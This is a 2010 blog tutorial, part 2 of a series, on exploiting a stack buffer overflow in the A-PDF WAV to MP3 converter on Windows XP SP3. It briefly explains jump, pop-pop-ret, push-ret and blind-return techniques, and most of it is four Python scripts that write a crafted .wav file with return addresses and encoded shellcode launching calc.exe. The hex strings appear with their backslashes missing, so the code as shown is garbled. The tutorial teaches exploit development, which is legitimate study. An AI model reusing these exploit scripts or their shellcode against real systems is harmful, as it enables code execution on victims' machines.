jump to navigation

Tutorial write an exploit Part 2 October 29, 2010

Posted by michelemanzotti in manzotti.eu, Security, Tutorial.
Tags: , , , , , , , , ,
1 comment so far

After having fully understood the tutorial part 1 let’s go to read the second one. In this tutorial we will see further techniques to exploit a BOF of the program a-pdf, a tool to convert WAV to MP3.

JUMP or CALL

With these techniques you use a register that contains the address where the shellcode resides and put it in EIP. This technique has been described in the tutorial part 1, with variant that could be used with a call instead of jmp.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 1002F1C3 call esp in lame_enc.dll
eip = ("xc3xf1x02x10");
nops = ("x90" * 16);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +  shellcode);

try:
    f1 = open("Drop.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

POP RETURN

If any register points directly to the shellcode but you can see the address on the stack (first, second, third address in the stack) that points to the shellcode then you can load that value into EIP by first putting a pointer to pop ret or pop pop ret (depending on where the location is found on the stack ) into EIP.
In the first tutorial we have seen that the shellcode was located exactly into EIP, it was necessary to add more 8 nops so the shellcode began at first byte.
Let’s suppose that the shellcode is located after 8 bytes. To catch it we could use a pop pop ret, by looking for in dll loaded, and then load the jmp esp to point directly to the shellcode. So we have an address that points to a pop pop ret opcode into EIP and soon after the 8 bytes (junk) there is the jmp esp opcode that jumps to the shellcode.

[ BOF ] [pop pop ret] [junk] [ jmp esp ] [nops] [shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 00428F3F jmp esp in wavtomp3.exe
# 10034207 pop pop ret in lame_enc.dll
eip = ("x07x42x03x10");
esp = ("x3fx8fx42x00");
junk = ("x42" * 8);
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + junk + esp + nops +shellcode);

try:
    f1 = open("Drop2.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

PUSH RETURN

This techinque is a little bit different from CALL a register approach. If you don’t find out anywhere a jmp or call reg opcode then you could put the address directly into the stack and do a ret. Basically you look for a push reg followed by a ret and then you put the address of this opcode into eip.

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 0047A01D push esp ret in wavtomp3.exe
eip = ("x1dxa0x47x00");
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + nops +shellcode);

try:
    f1 = open("Drop3.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

JUMP [reg + offset]

If there is a register that points to the buffer containing the shellcode, but it does not point at the beginning of the shellcode, you can also try to find an instruction in one of the OS or dll’s application, which will add the required bytes to the register and then jumps to the register. E.g. a jmp dword ptr [esp+8].

BLIND RETURN

A RET instruction pop the last value (4bytes) from the stack and put that address in ESP. So if you overwrite EIP with the address that perform a RET instruction, you load the value stored at ESP into EIP.

We need to:
– Overwrite the eip with the address that points to ret opcode
– Enter the address that points to the shellcode in the first 4 bytes of the ESP
So when the ret is executed, the last added 4 bytes are popped from the stack and put in EIP.

[BOF][ret opcode address][shellcode address][shellcode]

#!/usr/bin/env python

# http://www.exploit-db.com/exploits/14681/

#################################################################################
#
# Title:    A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By:    Dr_IDE
# Tested On:    XPSP3
# Date:        August 18, 2010
# Download:     http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference:    http://www.exploit-db.com/exploits/14676/
# Usage:    Import File, Select It, Click Play, Calc.
#
# EDB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
#
#################################################################################

# windows/exec - 303 bytes  CMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH

buff = ("x41" * 4128);
# 76541842 ret in user32.dll
# 00428F3F jmp esp in wavtomp3.exe
eip = ("x42x18x54x76");
esp = ("x3fx8fx42x00");
nops = ("x90" * 4);
shellcode = ("x33xc9xb8x57xbaxf8x4bxdbxdaxb1x33xd9x74x24xf4"
"x5bx83xebxfcx31x43x0dx03x43x5ax58x0dxb7x8cx15"
"xeex48x4cx46x66xadx7dx54x1cxa5x2fx68x56xebxc3"
"x03x3ax18x50x61x93x2fxd1xccxc5x1exe2xe0xc9xcd"
"x20x62xb6x0fx74x44x87xdfx89x85xc0x02x61xd7x99"
"x49xd3xc8xaex0cxefxe9x60x1bx4fx92x05xdcx3bx28"
"x07x0dx93x27x4fxb5x98x60x70xc4x4dx73x4cx8fxfa"
"x40x26x0ex2ax99xc7x20x12x76xf6x8cx9fx86x3ex2a"
"x7fxfdx34x48x02x06x8fx32xd8x83x12x94xabx34xf7"
"x24x78xa2x7cx2ax35xa0xdbx2fxc8x65x50x4bx41x88"
"xb7xddx11xafx13x85xc2xcex02x63xa5xefx55xcbx1a"
"x4ax1dxfex4fxecx7cx95x8ex7cxfbxd0x90x7ex04x73"
"xf8x4fx8fx1cx7fx50x5ax59x81xa1x57x74x15x18x02"
"x35x78x9bxf8x7ax84x18x09x03x73x00x78x06x38x86"
"x90x7ax51x63x97x29x52xa6xf4xacxc0x2axd5x4bx60"
"xc8x29x9e");
sploit = (buff + eip + esp + nops +shellcode);

try:
    f1 = open("Drop4.wav","w");    #No file checking, any file extension works... (.xyz .foo .abc)
    f1.write(sploit);
    f1.close();
    print ('[*] Success. Load File.');

except:
    print ("[-] Error, could not write the file.");

SEH

Every application has a default exception handler which is provided by the OS. So even if the application itself does not use exception handling, you can try to overwrite the SEH handler with your own address and make it jump to your shellcode. Using SEH can make an exploit more reliable on various windows platforms, but it requires some more explanations before you can start abusing the SEH to write exploits. That’s why the next tutorial will be entirely dedicated to this technique.

The following video shows these techniques just described:

See you
Michele `m7x` Manzotti

References: Thanks to Corelan.

Advertisements